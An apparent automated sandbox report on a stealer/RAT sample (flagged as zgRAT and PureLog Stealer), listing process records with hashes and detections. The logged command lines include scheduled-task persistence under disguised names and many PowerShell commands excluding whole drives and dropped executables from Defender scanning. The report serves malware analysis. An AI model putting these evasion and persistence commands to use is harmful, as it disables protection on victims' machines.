                                                  Imagebase:0x7ff75da10000
                                                  File size:862'208 bytes
                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high
                                                  Has exited:true

                                                  General

                                                  Target ID:17
                                                  Start time:07:31:27
                                                  Start date:13/01/2025
                                                  Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user~1\AppData\Local\Temp\RES63F2.tmp" "c:\Program Files (x86)\Microsoft\Edge\Application\CSC1E5328BD43674D66B913D17F64F40B9.TMP"
                                                  Imagebase:0x7ff7b0980000
                                                  File size:52'744 bytes
                                                  MD5 hash:C877CBB966EA5939AA2A17B6A5160950
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high
                                                  Has exited:true

                                                  General

                                                  Target ID:18
                                                  Start time:07:31:27
                                                  Start date:13/01/2025
                                                  Path:C:\msportComWin\jnowHpJlZlXal.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\msportComWin\jnowHpJlZlXal.exe
                                                  Imagebase:0xe50000
                                                  File size:2'002'944 bytes
                                                  MD5 hash:5F80A11E82CC7495CF5AD7DF3D052721
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Antivirus matches:
                                                  • Detection: 83%, ReversingLabs
                                                  Reputation:low
                                                  Has exited:true

                                                  General

                                                  Target ID:19
                                                  Start time:07:31:27
                                                  Start date:13/01/2025
                                                  Path:C:\msportComWin\jnowHpJlZlXal.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\msportComWin\jnowHpJlZlXal.exe
                                                  Imagebase:0xc20000
                                                  File size:2'002'944 bytes
                                                  MD5 hash:5F80A11E82CC7495CF5AD7DF3D052721
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:low
                                                  Has exited:true

                                                  General

                                                  Target ID:20
                                                  Start time:07:31:28
                                                  Start date:13/01/2025
                                                  Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\qtco0uvf\qtco0uvf.cmdline"
                                                  Imagebase:0x7ff7842e0000
                                                  File size:2'759'232 bytes
                                                  MD5 hash:F65B029562077B648A6A5F6A1AA76A66
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:moderate
                                                  Has exited:true

                                                  General

                                                  Target ID:21
                                                  Start time:07:31:28
                                                  Start date:13/01/2025
                                                  Path:C:\Windows\System32\conhost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  Imagebase:0x7ff75da10000
                                                  File size:862'208 bytes
                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high
                                                  Has exited:true

                                                  General

                                                  Target ID:22
                                                  Start time:07:31:28
                                                  Start date:13/01/2025
                                                  Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user~1\AppData\Local\Temp\RES6615.tmp" "c:\Windows\System32\CSC73DB2FDC8AEF4C699A318C77CEE246D.TMP"
                                                  Imagebase:0x7ff7b0980000
                                                  File size:52'744 bytes
                                                  MD5 hash:C877CBB966EA5939AA2A17B6A5160950
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high
                                                  Has exited:true

                                                  General

                                                  Target ID:28
                                                  Start time:07:31:29
                                                  Start date:13/01/2025
                                                  Path:C:\Windows\System32\schtasks.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:schtasks.exe /create /tn "jnowHpJlZlXalj" /sc MINUTE /mo 13 /tr "'C:\Program Files\Uninstall Information\jnowHpJlZlXal.exe'" /rl HIGHEST /f
                                                  Imagebase:0x7ff658d30000
                                                  File size:235'008 bytes
                                                  MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  General

                                                  Target ID:35
                                                  Start time:07:31:29
                                                  Start date:13/01/2025
                                                  Path:C:\Windows\System32\schtasks.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:schtasks.exe /create /tn "BridgePortsurrogateserverrefB" /sc MINUTE /mo 13 /tr "'C:\msportComWin\BridgePortsurrogateserverref.exe'" /f
                                                  Imagebase:0x7ff658d30000
                                                  File size:235'008 bytes
                                                  MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  General

                                                  Target ID:38
                                                  Start time:07:31:29
                                                  Start date:13/01/2025
                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:/'
                                                  Imagebase:0x7ff741d30000
                                                  File size:452'608 bytes
                                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  General

                                                  Target ID:39
                                                  Start time:07:31:29
                                                  Start date:13/01/2025
                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:/$Recycle.Bin/'
                                                  Imagebase:0x7ff741d30000
                                                  File size:452'608 bytes
                                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  General

                                                  Target ID:40
                                                  Start time:07:31:29
                                                  Start date:13/01/2025
                                                  Path:C:\Windows\System32\conhost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  Imagebase:0x7ff75da10000
                                                  File size:862'208 bytes
                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:false

                                                  General

                                                  Target ID:41
                                                  Start time:07:31:29
                                                  Start date:13/01/2025
                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:/$WinREAgent/'
                                                  Imagebase:0x7ff741d30000
                                                  File size:452'608 bytes
                                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  General

                                                  Target ID:42
                                                  Start time:07:31:29
                                                  Start date:13/01/2025
                                                  Path:C:\Windows\System32\conhost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  Imagebase:0x7ff75da10000
                                                  File size:862'208 bytes
                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:false

                                                  General

                                                  Target ID:43
                                                  Start time:07:31:29
                                                  Start date:13/01/2025
                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Documents and Settings/'
                                                  Imagebase:0x7ff741d30000
                                                  File size:452'608 bytes
                                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  General

                                                  Target ID:44
                                                  Start time:07:31:29
                                                  Start date:13/01/2025
                                                  Path:C:\Windows\System32\conhost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  Imagebase:0x7ff75da10000
                                                  File size:862'208 bytes
                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:false

                                                  General

                                                  Target ID:45
                                                  Start time:07:31:29
                                                  Start date:13/01/2025
                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:/msportComWin/'
                                                  Imagebase:0x7ff741d30000
                                                  File size:452'608 bytes
                                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  General

                                                  Target ID:46
                                                  Start time:07:31:29
                                                  Start date:13/01/2025
                                                  Path:C:\Windows\System32\conhost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  Imagebase:0x7ff75da10000
                                                  File size:862'208 bytes
                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:false

                                                  General

                                                  Target ID:47
                                                  Start time:07:31:29
                                                  Start date:13/01/2025
                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:/PerfLogs/'
                                                  Imagebase:0x7ff741d30000
                                                  File size:452'608 bytes
                                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  General

                                                  Target ID:48
                                                  Start time:07:31:29
                                                  Start date:13/01/2025
                                                  Path:C:\Windows\System32\conhost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  Imagebase:0x7ff75da10000
                                                  File size:862'208 bytes
                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:false

                                                  General

                                                  Target ID:49
                                                  Start time:07:31:29
                                                  Start date:13/01/2025
                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files/'
                                                  Imagebase:0x7ff741d30000
                                                  File size:452'608 bytes
                                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  General

                                                  Target ID:50
                                                  Start time:07:31:29
                                                  Start date:13/01/2025
                                                  Path:C:\Windows\System32\conhost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  Imagebase:0x7ff75da10000
                                                  File size:862'208 bytes
                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:false

                                                  General

                                                  Target ID:51
                                                  Start time:07:31:29
                                                  Start date:13/01/2025
                                                  Path:C:\Windows\System32\conhost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  Imagebase:0x7ff75da10000
                                                  File size:862'208 bytes
                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:false

                                                  General

                                                  Target ID:52
                                                  Start time:07:31:29
                                                  Start date:13/01/2025
                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files (x86)/'
                                                  Imagebase:0x7ff741d30000
                                                  File size:452'608 bytes
                                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  General

                                                  Target ID:53
                                                  Start time:07:31:29
                                                  Start date:13/01/2025
                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:/ProgramData/'
                                                  Imagebase:0x7ff741d30000
                                                  File size:452'608 bytes
                                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  General

                                                  Target ID:54
                                                  Start time:07:31:29
                                                  Start date:13/01/2025
                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Recovery/'
                                                  Imagebase:0x7ff741d30000
                                                  File size:452'608 bytes
                                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  General

                                                  Target ID:55
                                                  Start time:07:31:29
                                                  Start date:13/01/2025
                                                  Path:C:\Windows\System32\conhost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  Imagebase:0x7ff75da10000
                                                  File size:862'208 bytes
                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:false

                                                  General

                                                  Target ID:56
                                                  Start time:07:31:29
                                                  Start date:13/01/2025
                                                  Path:C:\Windows\System32\conhost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  Imagebase:0x7ff75da10000
                                                  File size:862'208 bytes
                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:false

                                                  General

                                                  Target ID:57
                                                  Start time:07:31:29
                                                  Start date:13/01/2025
                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:/System Volume Information/'
                                                  Imagebase:0x7ff741d30000
                                                  File size:452'608 bytes
                                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  General

                                                  Target ID:58
                                                  Start time:07:31:29
                                                  Start date:13/01/2025
                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Users/'
                                                  Imagebase:0x7ff741d30000
                                                  File size:452'608 bytes
                                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  General

                                                  Target ID:59
                                                  Start time:07:31:29
                                                  Start date:13/01/2025
                                                  Path:C:\Windows\System32\conhost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  Imagebase:0x7ff75da10000
                                                  File size:862'208 bytes
                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:false

                                                  General

                                                  Target ID:60
                                                  Start time:07:31:29
                                                  Start date:13/01/2025
                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Windows/'
                                                  Imagebase:0x7ff741d30000
                                                  File size:452'608 bytes
                                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  General

                                                  Target ID:61
                                                  Start time:07:31:29
                                                  Start date:13/01/2025
                                                  Path:C:\Windows\System32\conhost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  Imagebase:0x7ff75da10000
                                                  File size:862'208 bytes
                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:false

                                                  General

                                                  Target ID:62
                                                  Start time:07:31:29
                                                  Start date:13/01/2025
                                                  Path:C:\Windows\System32\conhost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  Imagebase:0x7ff75da10000
                                                  File size:862'208 bytes
                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:false

                                                  General

                                                  Target ID:63
                                                  Start time:07:31:29
                                                  Start date:13/01/2025
                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:\msportComWin\jnowHpJlZlXal.exe'
                                                  Imagebase:0x7ff741d30000
                                                  File size:452'608 bytes
                                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  General

                                                  Target ID:64
                                                  Start time:07:31:29
                                                  Start date:13/01/2025
                                                  Path:C:\Windows\System32\conhost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  Imagebase:0x7ff75da10000
                                                  File size:862'208 bytes
                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:false

                                                  General

                                                  Target ID:65
                                                  Start time:07:31:29
                                                  Start date:13/01/2025
                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\7-Zip\Lang\jnowHpJlZlXal.exe'
                                                  Imagebase:0x7ff741d30000
                                                  File size:452'608 bytes
                                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  General

                                                  Target ID:66
                                                  Start time:07:31:29
                                                  Start date:13/01/2025
                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Uninstall Information\jnowHpJlZlXal.exe'
                                                  Imagebase:0x7ff741d30000
                                                  File size:452'608 bytes
                                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  General

                                                  Target ID:67
                                                  Start time:07:31:29
                                                  Start date:13/01/2025
                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\jnowHpJlZlXal.exe'
                                                  Imagebase:0x7ff741d30000
                                                  File size:452'608 bytes
                                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  General

                                                  Target ID:68
                                                  Start time:07:31:29
                                                  Start date:13/01/2025
                                                  Path:C:\Windows\System32\conhost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  Imagebase:0x7ff75da10000
                                                  File size:862'208 bytes
                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:false

                                                  General

                                                  Target ID:69
                                                  Start time:07:31:29
                                                  Start date:13/01/2025
                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\services.exe'
                                                  Imagebase:0x7ff741d30000
                                                  File size:452'608 bytes
                                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  General

                                                  Target ID:70
                                                  Start time:07:31:29
                                                  Start date:13/01/2025
                                                  Path:C:\Windows\System32\conhost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  Imagebase:0x7ff75da10000
                                                  File size:862'208 bytes
                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:false

                                                  General

                                                  Target ID:71
                                                  Start time:07:31:29
                                                  Start date:13/01/2025
                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:\msportComWin\BridgePortsurrogateserverref.exe'
                                                  Imagebase:0x7ff741d30000
                                                  File size:452'608 bytes
                                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  General

                                                  Target ID:72
                                                  Start time:07:31:29
                                                  Start date:13/01/2025
                                                  Path:C:\Windows\System32\conhost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  Imagebase:0x7ff75da10000
                                                  File size:862'208 bytes
                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:false

                                                  General

                                                  Target ID:73
                                                  Start time:07:31:29
                                                  Start date:13/01/2025
                                                  Path:C:\Windows\System32\conhost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  Imagebase:0x7ff75da10000
                                                  File size:862'208 bytes
                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:false

                                                  General

                                                  Target ID:74
                                                  Start time:07:31:30
                                                  Start date:13/01/2025
                                                  Path:C:\msportComWin\BridgePortsurrogateserverref.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\msportComWin\BridgePortsurrogateserverref.exe
                                                  Imagebase:0xff0000
                                                  File size:2'002'944 bytes
                                                  MD5 hash:5F80A11E82CC7495CF5AD7DF3D052721
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  General

                                                  Target ID:75
                                                  Start time:07:31:30
                                                  Start date:13/01/2025
                                                  Path:C:\Windows\System32\conhost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  Imagebase:0x7ff75da10000
                                                  File size:862'208 bytes
                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:false

                                                  General

                                                  Target ID:76
                                                  Start time:07:31:30
                                                  Start date:13/01/2025
                                                  Path:C:\Windows\System32\conhost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  Imagebase:0x7ff75da10000
                                                  File size:862'208 bytes
                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:false

                                                  General

                                                  Target ID:77
                                                  Start time:07:31:31
                                                  Start date:13/01/2025
                                                  Path:C:\Windows\System32\cmd.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:"C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\8SIf5KWJtt.bat"
                                                  Imagebase:0x7ff74ccc0000
                                                  File size:289'792 bytes
                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  General

                                                  Target ID:78
                                                  Start time:07:31:31
                                                  Start date:13/01/2025
                                                  Path:C:\msportComWin\BridgePortsurrogateserverref.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\msportComWin\BridgePortsurrogateserverref.exe
                                                  Imagebase:0xf10000
                                                  File size:2'002'944 bytes
                                                  MD5 hash:5F80A11E82CC7495CF5AD7DF3D052721
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  General

                                                  Target ID:80
                                                  Start time:07:31:31
                                                  Start date:13/01/2025
                                                  Path:C:\Windows\System32\conhost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  Imagebase:0x7ff75da10000
                                                  File size:862'208 bytes
                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  General

                                                  Target ID:81
                                                  Start time:07:31:32
                                                  Start date:13/01/2025
                                                  Path:C:\Recovery\services.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Recovery\services.exe
                                                  Imagebase:0x360000
                                                  File size:2'002'944 bytes
                                                  MD5 hash:5F80A11E82CC7495CF5AD7DF3D052721
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Yara matches:
                                                  • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Recovery\services.exe, Author: Joe Security
                                                  • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Recovery\services.exe, Author: Joe Security
                                                  Antivirus matches:
                                                  • Detection: 100%, Avira
                                                  • Detection: 100%, Joe Sandbox ML
                                                  • Detection: 83%, ReversingLabs
                                                  Has exited:true

                                                  General

                                                  Target ID:82
                                                  Start time:07:31:33
                                                  Start date:13/01/2025
                                                  Path:C:\Recovery\services.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Recovery\services.exe
                                                  Imagebase:0xe60000
                                                  File size:2'002'944 bytes
                                                  MD5 hash:5F80A11E82CC7495CF5AD7DF3D052721
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  General

                                                  Target ID:83
                                                  Start time:07:31:35
                                                  Start date:13/01/2025
                                                  Path:C:\Windows\System32\chcp.com
                                                  Wow64 process (32bit):false
                                                  Commandline:chcp 65001
                                                  Imagebase:0x7ff616fa0000
                                                  File size:14'848 bytes
                                                  MD5 hash:33395C4732A49065EA72590B14B64F32
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  Disassembly

                                                  Reset < >

                                                    Execution Graph

                                                    Execution Coverage:9.4%
                                                    Dynamic/Decrypted Code Coverage:0%
                                                    Signature Coverage:9.5%
                                                    Total number of Nodes:1490
                                                    Total number of Limit Nodes:43
